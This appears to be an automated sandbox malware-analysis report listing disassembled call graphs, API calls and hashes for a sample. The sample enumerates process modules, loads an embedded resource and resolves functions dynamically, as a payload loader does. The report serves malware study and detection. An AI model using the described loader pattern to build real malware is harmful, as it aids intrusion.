12562->12564 12566 40d63e 12562->12566 12563 413d5b __set_error_mode 63 API calls 12563->12562 12565 40ec79 12564->12565 12567 40eaa2 __NMSG_WRITE 63 API calls 12565->12567 12568 40eaa2 12566->12568 12567->12566 12569 40eab6 12568->12569 12570 413d5b __set_error_mode 60 API calls 12569->12570 12601 40d645 12569->12601 12571 40ead8 12570->12571 12572 40ec16 GetStdHandle 12571->12572 12573 413d5b __set_error_mode 60 API calls 12571->12573 12574 40ec24 _strlen 12572->12574 12572->12601 12576 40eae9 12573->12576 12577 40ec3d WriteFile 12574->12577 12574->12601 12575 
40eafb 12575->12601 12619 40ef42 12575->12619 12576->12572 12576->12575 12577->12601 12580 40eb31 GetModuleFileNameA 12582 40eb4f 12580->12582 12586 40eb72 _strlen 12580->12586 12584 40ef42 _strcpy_s 60 API calls 12582->12584 12585 40eb5f 12584->12585 12585->12586 12588 40e61c __invoke_watson 10 API calls 12585->12588 12587 40ebb5 12586->12587 12635 411da6 12586->12635 12644 413ce7 12587->12644 12588->12586 12592 40ebd9 12595 413ce7 _strcat_s 60 API calls 12592->12595 12594 40e61c __invoke_watson 10 API calls 12594->12592 12596 40ebed 12595->12596 12598 40ebfe 12596->12598 12599 40e61c __invoke_watson 10 API calls 12596->12599 12597 40e61c __invoke_watson 10 API calls 12597->12587 12653 413b7e 12598->12653 12599->12598 12602 40e7ee 12601->12602 12691 40e7c3 GetModuleHandleW 12602->12691 12608 411c7e 12605->12608 12607 40d66a 12607->12542 12607->12543 12608->12607 12609 411c95 Sleep 12608->12609 12695 40b84d 12608->12695 12609->12608 12725 40d606 LeaveCriticalSection 12610->12725 12612 40d6de 12612->12544 12616 413d6a 12613->12616 12614 40bfc1 __output_l 63 API calls 12617 413d8d 12614->12617 12615 40ec54 12615->12562 12615->12563 12616->12614 12616->12615 12618 40e744 __output_l 6 API calls 12617->12618 12618->12615 12620 40ef53 12619->12620 12621 40ef5a 12619->12621 12620->12621 12626 40ef80 12620->12626 12622 40bfc1 __output_l 63 API calls 12621->12622 12623 40ef5f 12622->12623 12624 40e744 __output_l 6 API calls 12623->12624 12625 40eb1d 12624->12625 12625->12580 12628 40e61c 12625->12628 12626->12625 12627 40bfc1 __output_l 63 API calls 12626->12627 12627->12623 12680 40ba30 12628->12680 12630 40e649 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 12631 40e725 GetCurrentProcess TerminateProcess 12630->12631 12632 40e719 __invoke_watson 12630->12632 12682 40ce09 12631->12682 12632->12631 12634 40e742 12634->12580 12636 411db8 12635->12636 12637 411dbc 12636->12637 12638 40eba2 12636->12638 12642 411e02 12636->12642 12637->12638 12639 
40bfc1 __output_l 63 API calls 12637->12639 12638->12587 12638->12597 12640 411dd8 12639->12640 12641 40e744 __output_l 6 API calls 12640->12641 12641->12638 12642->12638 12643 40bfc1 __output_l 63 API calls 12642->12643 12643->12640 12645 413cff 12644->12645 12648 413cf8 12644->12648 12646 40bfc1 __output_l 63 API calls 12645->12646 12647 413d04 12646->12647 12649 40e744 __output_l 6 API calls 12647->12649 12648->12645 12651 413d33 12648->12651 12650 40ebc8 12649->12650 12650->12592 12650->12594 12651->12650 12652 40bfc1 __output_l 63 API calls 12651->12652 12652->12647 12654 4104e0 _doexit 6 API calls 12653->12654 12655 413b8e 12654->12655 12656 413ba1 LoadLibraryA 12655->12656 12660 413c29 12655->12660 12658 413ccb 12656->12658 12659 413bb6 GetProcAddress 12656->12659 12657 413c53 12663 4104e9 __decode_pointer 6 API calls 12657->12663 12678 413c7e 12657->12678 12658->12601 12659->12658 12661 413bcc 12659->12661 12660->12657 12664 4104e9 __decode_pointer 6 API calls 12660->12664 12665 41046e __encode_pointer 6 API calls 12661->12665 12662 4104e9 __decode_pointer 6 API calls 12662->12658 12674 413c96 12663->12674 12666 413c46 12664->12666 12667 413bd2 GetProcAddress 12665->12667 12668 4104e9 __decode_pointer 6 API calls 12666->12668 12669 41046e __encode_pointer 6 API calls 12667->12669 12668->12657 12670 413be7 GetProcAddress 12669->12670 12671 41046e __encode_pointer 6 API calls 12670->12671 12672 413bfc GetProcAddress 12671->12672 12673 41046e __encode_pointer 6 API calls 12672->12673 12676 413c11 12673->12676 12675 4104e9 __decode_pointer 6 API calls 12674->12675 12674->12678 12675->12678 12676->12660 12677 413c1b GetProcAddress 12676->12677 12679 41046e __encode_pointer 6 API calls 12677->12679 12678->12662 12679->12660 12681 40ba3c __VEC_memzero 12680->12681 12681->12630 12683 40ce11 12682->12683 12684 40ce13 IsDebuggerPresent 12682->12684 12683->12634 12690 4138fc 12684->12690 12687 413706 SetUnhandledExceptionFilter UnhandledExceptionFilter 12688 413723 
__invoke_watson 12687->12688 12689 41372b GetCurrentProcess TerminateProcess 12687->12689 12688->12689 12689->12634 12690->12687 12692 40e7d7 GetProcAddress 12691->12692 12693 40e7ec ExitProcess 12691->12693 12692->12693 12694 40e7e7 CorExitProcess 12692->12694 12694->12693 12696 40b900 12695->12696 12707 40b85f 12695->12707 12697 40d2e3 _realloc 6 API calls 12696->12697 12698 40b906 12697->12698 12700 40bfc1 __output_l 62 API calls 12698->12700 12699 40ec4d __FF_MSGBANNER 62 API calls 12705 40b870 12699->12705 12701 40b8f8 12700->12701 12701->12608 12702 40eaa2 __NMSG_WRITE 62 API calls 12702->12705 12704 40b8bc RtlAllocateHeap 12704->12707 12705->12699 12705->12702 12706 40e7ee _doexit 4 API calls 12705->12706 12705->12707 12706->12705 12707->12701 12707->12704 12707->12705 12708 40b8ec 12707->12708 12709 40d2e3 _realloc 6 API calls 12707->12709 12711 40b8f1 12707->12711 12713 40b7fe 12707->12713 12710 40bfc1 __output_l 62 API calls 12708->12710 12709->12707 12710->12711 12712 40bfc1 __output_l 62 API calls 12711->12712 12712->12701 12714 40b80a __fcloseall 12713->12714 12715 40d6e0 __lock 63 API calls 12714->12715 12717 40b83b __fcloseall 12714->12717 12716 40b820 12715->12716 12718 40def2 ___sbh_alloc_block 5 API calls 12716->12718 12717->12707 12719 40b82b 12718->12719 12721 40b844 12719->12721 12724 40d606 LeaveCriticalSection 12721->12724 12723 40b84b 12723->12717 12724->12723 12725->12612 12727 40daa0 HeapAlloc 12726->12727 12728 40da6c HeapReAlloc 12726->12728 12730 40dac3 VirtualAlloc 12727->12730 12731 40da8a 12727->12731 12729 40da8e 12728->12729 12728->12731 12729->12727 12730->12731 12732 40dadd HeapFree 12730->12732 12731->12501 12732->12731 12734 40db20 VirtualAlloc 12733->12734 12736 40db67 12734->12736 12736->12498 12737->12504 12738->12437 12757 40d606 LeaveCriticalSection 12739->12757 12741 41066c 12741->12447 12743 4145f0 InterlockedIncrement 12742->12743 12744 4145f3 12742->12744 12743->12744 12745 414600 12744->12745 12746 4145fd 
InterlockedIncrement 12744->12746 12747 41460a InterlockedIncrement 12745->12747 12748 41460d 12745->12748 12746->12745 12747->12748 12749 414617 InterlockedIncrement 12748->12749 12751 41461a 12748->12751 12749->12751 12750 414633 InterlockedIncrement 12750->12751 12751->12750 12752 414643 InterlockedIncrement 12751->12752 12753 41464e InterlockedIncrement 12751->12753 12752->12751 12753->12450 12758 40d606 LeaveCriticalSection 12754->12758 12756 4106ba 12756->12452 12757->12741 12758->12756 12759->12246 12762 41265c 12760->12762 12764 4126c9 12762->12764 12770 416836 12762->12770 12763 4127c7 12763->12292 12763->12293 12764->12763 12765 416836 73 API calls _parse_cmdline 12764->12765 12765->12764 12767 414474 12766->12767 12768 41447b 12766->12768 12992 4142d1 12767->12992 12768->12286 12773 4167e3 12770->12773 12776 40ec86 12773->12776 12777 40ec99 12776->12777 12783 40ece6 12776->12783 12784 410735 12777->12784 12780 40ecc6 12780->12783 12804 413fcc 12780->12804 12783->12762 12785 4106bc __getptd_noexit 63 API calls 12784->12785 12786 41073d 12785->12786 12787 40ec9e 12786->12787 12788 40e79a __amsg_exit 63 API calls 12786->12788 12787->12780 12789 414738 12787->12789 12788->12787 12790 414744 __fcloseall 12789->12790 12791 410735 __getptd 63 API calls 12790->12791 12792 414749 12791->12792 12793 414777 12792->12793 12794 41475b 12792->12794 12795 40d6e0 __lock 63 API calls 12793->12795 12796 410735 __getptd 63 API calls 12794->12796 12797 41477e 12795->12797 12798 414760 12796->12798 12820 4146fa 12797->12820 12801 41476e __fcloseall 12798->12801 12803 40e79a __amsg_exit 63 API calls 12798->12803 12801->12780 12803->12801 12805 413fd8 __fcloseall 12804->12805 12806 410735 __getptd 63 API calls 12805->12806 12807 413fdd 12806->12807 12808 40d6e0 __lock 63 API calls 12807->12808 12809 413fef 12807->12809 12811 41400d 12808->12811 12810 413ffd __fcloseall 12809->12810 12813 40e79a __amsg_exit 63 API calls 12809->12813 12810->12783 12812 414056 12811->12812 12815 
414024 InterlockedDecrement 12811->12815 12816 41403e InterlockedIncrement 12811->12816 12988 414067 12812->12988 12813->12810 12815->12816 12817 41402f 12815->12817 12816->12812 12817->12816 12818 40b6b5 __output_l 63 API calls 12817->12818 12819 41403d 12818->12819 12819->12816 12821 4146fe 12820->12821 12822 414730 12820->12822 12821->12822 12823 4145d2 ___addlocaleref 8 API calls 12821->12823 12828 4147a2 12822->12828 12824 414711 12823->12824 12824->12822 12831 414661 12824->12831 12987 40d606 LeaveCriticalSection 12828->12987 12830 4147a9 12830->12798 12832 414672 InterlockedDecrement 12831->12832 12833 4146f5 12831->12833 12834 414687 InterlockedDecrement 12832->12834 12835 41468a 12832->12835 12833->12822 12845 414489 12833->12845 12834->12835 12836 414694 InterlockedDecrement 12835->12836 12837 414697 12835->12837 12836->12837 12838 4146a1 InterlockedDecrement 12837->12838 12839 4146a4 12837->12839 12838->12839 12840 4146ae InterlockedDecrement 12839->12840 12841 4146b1 12839->12841 12840->12841 12842 4146ca InterlockedDecrement 12841->12842 12843 4146da InterlockedDecrement 12841->12843 12844 4146e5 InterlockedDecrement 12841->12844 12842->12841 12843->12841 12844->12833 12846 41450d 12845->12846 12850 4144a0 12845->12850 12848 40b6b5 __output_l 63 API calls 12846->12848 12849 41455a 12846->12849 12847 414581 12858 4145c6 12847->12858 12864 40b6b5 63 API calls __output_l 12847->12864 12851 41452e 12848->12851 12849->12847 12899 417667 12849->12899 12850->12846 12856 4144d4 12850->12856 12860 40b6b5 __output_l 63 API calls 12850->12860 12853 40b6b5 __output_l 63 API calls 12851->12853 12855 414541 12853->12855 12863 40b6b5 __output_l 63 API calls 12855->12863 12865 40b6b5 __output_l 63 API calls 12856->12865 12874 4144f5 12856->12874 12857 40b6b5 __output_l 63 API calls 12866 414502 12857->12866 12861 40b6b5 __output_l 63 API calls 12858->12861 12859 40b6b5 __output_l 63 API calls 12859->12847 12862 4144c9 12860->12862 12867 4145cc 12861->12867 12875 
40c270 14530->14531 14532 40c279 14530->14532 14533 40c2ab _flsall 101 API calls 14531->14533 14534 40c1fb __flush 97 API calls 14532->14534 14536 40c276 14533->14536 14535 40c27f 14534->14535 14535->14536 14537 40fa20 __fileno 63 API calls 14535->14537 14540 40c3ce 14536->14540 14538 40c298 14537->14538 14561 4117e3 14538->14561 14541 40fb9c _fputc 2 API calls 14540->14541 14542 40c3d6 14541->14542 14542->14518 14544 40fb77 14543->14544 14545 40fb8d EnterCriticalSection 14543->14545 14546 40d6e0 __lock 63 API calls 14544->14546 14545->14529 14547 40fb80 14546->14547 14547->14529 14554 40fbd8 14548->14554 14550 40c35b 14550->14529 14560 40d606 LeaveCriticalSection 14551->14560 14553 40c383 14553->14526 14555 40fbe8 14554->14555 14556 40fbfb LeaveCriticalSection 14554->14556 14559 40d606 LeaveCriticalSection 14555->14559 14556->14550 14558 40fbf8 14558->14550 14559->14558 14560->14553 14562 4117ef __fcloseall 14561->14562 14563 4117f7 14562->14563 14564 41180a 14562->14564 14565 40bfc1 __output_l 63 API calls 14563->14565 14566 411818 14564->14566 14569 411852 14564->14569 14572 4117fc __fcloseall 14565->14572 14567 40bfc1 __output_l 63 API calls 14566->14567 14568 41181d 14567->14568 14570 40e744 __output_l 6 API calls 14568->14570 14571 415599 ___lock_fhandle 64 API calls 14569->14571 14570->14572 14573 411858 14571->14573 14572->14536 14574 411891 14573->14574 14575 415522 __lseek_nolock 63 API calls 14573->14575 14576 40bfc1 __output_l 63 API calls 14574->14576 14577 41186d FlushFileBuffers 14575->14577 14578 41189b 14576->14578 14579 411884 14577->14579 14580 411879 GetLastError 14577->14580 14583 4118ba 14578->14583 14579->14578 14582 40bfd4 __lseeki64 63 API calls 14579->14582 14580->14579 14582->14574 14586 415639 LeaveCriticalSection 14583->14586 14585 4118c2 14585->14572 14586->14585

Control-flow Graph

control_flow_graph (rendered graph not recoverable from text; blocks listed with the calls they contain): entry 4019f0-401ac7 OleInitialize call 401650 call 40b99e; 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First; 401c9c-401caf CloseHandle; 401cf9-401d09 Module32Next; 401dad-401dbd Module32Next; 401dc3-401ed4 CloseHandle GetModuleHandleA call 401650 FindResourceA LoadResource LockResource SizeofResource call 40b84d call 40af66; 401ed6-401eed call 40ba30; 401ef3-401f1a call 401300 SizeofResource; 401f33-401f5d call 401560; 401f77-401f8d call 401560; 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress; 4021d0-402217 call 4018f0; 402257-4022b7 call 401870 #8 call 401870 #8 call 4018d0; 4022c3-40232a call 4018d0 #15 #23 call 40b350 #24; 402336-402352 call 4018d0; 402354-402355 #16; 40237d-4023a2 call 4018d0 #411; 4023bc-402417 #9 * 2 call 4019a0; 40241c-40242c #9; 402436-402445 call 4019a0; 402461-402467 call 40b6b5; exit 40248a-402496.
APIs
• OleInitialize.OLE32(00000000), ref: 004019FD
• _getenv.LIBCMT ref: 00401ABA
• GetCurrentProcessId.KERNEL32 ref: 00401ACD
• CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
• Module32First.KERNEL32 ref: 00401C48
• CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
• Module32Next.KERNEL32(00000000,?), ref: 00401D02
• Module32Next.KERNEL32(00000000,?), ref: 00401DB6
• CloseHandle.KERNELBASE(00000000), ref: 00401DC4
• GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
• FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
• LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
• LockResource.KERNEL32(00000000), ref: 00401EA7
• SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
• _malloc.LIBCMT ref: 00401EBA
• _memset.LIBCMT ref: 00401EDD
• SizeofResource.KERNEL32(00000000,?), ref: 00401F02
Strings
Memory Dump Source
• Source File: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000001.2446233147.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000001.2446233147.000000000045A000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_1_400000_rpkhzpuO.jbxd
Yara matches
Similarity
• API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
• String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
• API String ID: 1430744539-2962942730
• Opcode ID: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
• Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
• Opcode Fuzzy Hash: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
• Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B

Control-flow Graph

control_flow_graph (rendered graph not recoverable from text; blocks listed with the calls they contain): entry 4018f0-4018fa; 4018fc-401900; 401903-40193e lstrlenA call 4017e0 MultiByteToWideChar; 401940-401949 GetLastError; 40194b-40198c MultiByteToWideChar call 4017e0 MultiByteToWideChar; 40198d-40198f; 401991 call 401030; exit 401996-40199a.
APIs
• lstrlenA.KERNEL32(?), ref: 00401906
• MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
• GetLastError.KERNEL32 ref: 00401940
• MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
• MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
Memory Dump Source
• Source File: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000001.2446233147.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000001.2446233147.000000000045A000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_1_400000_rpkhzpuO.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$ErrorLastlstrlen
• String ID:
• API String ID: 3322701435-0
• Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
• Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
• Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
• Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8

Control-flow Graph

control_flow_graph (rendered graph not recoverable from text; blocks listed with the calls they contain): entry 40af66-40af6e; 40af7d-40af88 call 40b84d; 40af70-40af7b call 40d2e3; 40af8a-40af8b; 40af8c-40af98; 40af9a-40afb2 call 40aefc call 40d2bd; 40afb3-40afca call 40af49 call 40cd39.
APIs
• _malloc.LIBCMT ref: 0040AF80
  • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
  • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
  • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
• std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
  • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
• std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
• __CxxThrowException@8.LIBCMT ref: 0040AFC5
Memory Dump Source
• Source File: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000001.2446233147.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000001.2446233147.000000000045A000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_1_400000_rpkhzpuO.jbxd
Yara matches
Similarity
• API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
• String ID:
• API String ID: 1411284514-0
• Opcode ID: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
• Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
• Opcode Fuzzy Hash: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
• Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E

Control-flow Graph

control_flow_graph (rendered graph not recoverable from text; blocks listed with the calls they contain): entry 40e7ee-40e7f6 call 40e7c3; 40e7fb-40e7ff ExitProcess.
APIs
• ___crtCorExitProcess.LIBCMT ref: 0040E7F6
  • Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
  • Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
  • Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA
• ExitProcess.KERNEL32 ref: 0040E7FF
Memory Dump Source
• Source File: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000001.2446233147.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000001.2446233147.000000000045A000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_1_400000_rpkhzpuO.jbxd
Yara matches
Similarity
• API ID: ExitProcess$AddressHandleModuleProc___crt
• String ID:
• API String ID: 2427264223-0
• Opcode ID: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
• Instruction ID: d9ec683f250bcd397ae0bae66fbc2b9097e114182cfe22e5ca4178904d999afd
• Opcode Fuzzy Hash: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
• Instruction Fuzzy Hash: ADB09B31000108BFDB112F13DC09C493F59DB40750711C435F41805071DF719D5195D5

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 187 401870-401883 call 40af66 190 4018b2 187->190 191 401885-4018a2 SysAllocString 187->191 192 4018b4-4018b8 190->192 191->192 193 4018a4-4018a6 191->193 195 4018c4-4018c9 192->195 196 4018ba-4018bf call 40ad90 192->196 193->192 194 4018a8-4018ad call 40ad90 193->194 194->190 196->195
APIs
  • Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80
• SysAllocString.OLEAUT32 ref: 00401898
Memory Dump Source
• Source File: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000001.2446233147.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000001.2446233147.000000000045A000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_1_400000_rpkhzpuO.jbxd
Yara matches
Similarity
• API ID: AllocString_malloc
• String ID:
• API String ID: 959018026-0

Control-flow Graph
APIs
• HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549
Memory Dump Source
• Source File: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000001.2446233147.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000001.2446233147.000000000045A000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_1_400000_rpkhzpuO.jbxd
Yara matches
Similarity
• API ID: CreateHeap
• String ID:
• API String ID: 10892065-0

Control-flow Graph
APIs
• _doexit.LIBCMT ref: 0040EA16
  • Part of subcall function 0040E8DE: __lock.LIBCMT ref: 0040E8EC
  • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E923
  • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E938
  • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E962
  • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E978
  • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E985
  • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9B4
  • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9C4
Memory Dump Source
• Source File: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000001.2446233147.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000001.2446233147.000000000045A000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_1_400000_rpkhzpuO.jbxd
Yara matches
Similarity
• API ID: __decode_pointer$__initterm$__lock_doexit
• String ID:
• API String ID: 1597249276-0
APIs
• IsDebuggerPresent.KERNEL32 ref: 004136F4
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
• UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
• GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
• TerminateProcess.KERNEL32(00000000), ref: 00413737
Memory Dump Source
• Source File: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000001.2446233147.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000001.2446233147.000000000045A000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_1_400000_rpkhzpuO.jbxd
Yara matches
Similarity
• API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
• String ID:
• API String ID: 2579439406-0
APIs
• GetProcessHeap.KERNEL32 ref: 0040ADD0
• HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
Memory Dump Source
• Source File: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000001.2446233147.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000001.2446233147.000000000045A000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_1_400000_rpkhzpuO.jbxd
Yara matches
Similarity
• API ID: Heap$FreeProcess
• String ID:
• API String ID: 3859560861-0
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6
Memory Dump Source
• Source File: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000001.2446233147.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000001.2446233147.000000000045A000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_1_400000_rpkhzpuO.jbxd
Yara matches
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0

Control-flow Graph
APIs
• LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
• GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,00000000), ref: 004170C5
• MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
• _malloc.LIBCMT ref: 0041718A
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
• LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
• LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
• _malloc.LIBCMT ref: 0041724C
• LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
• __freea.LIBCMT ref: 004172A4
• __freea.LIBCMT ref: 004172AD
• ___ansicp.LIBCMT ref: 004172DE
• ___convertcp.LIBCMT ref: 00417309
• LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
• _malloc.LIBCMT ref: 00417362
• _memset.LIBCMT ref: 00417384
• LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
• ___convertcp.LIBCMT ref: 004173BA
• __freea.LIBCMT ref: 004173CF
• LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
Memory Dump Source
• Source File: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000001.2446233147.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000001.2446233147.000000000045A000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_1_400000_rpkhzpuO.jbxd
Yara matches
Similarity
• API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
• String ID:
• API String ID: 3809854901-0
                                                                                                                                      • Opcode ID: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
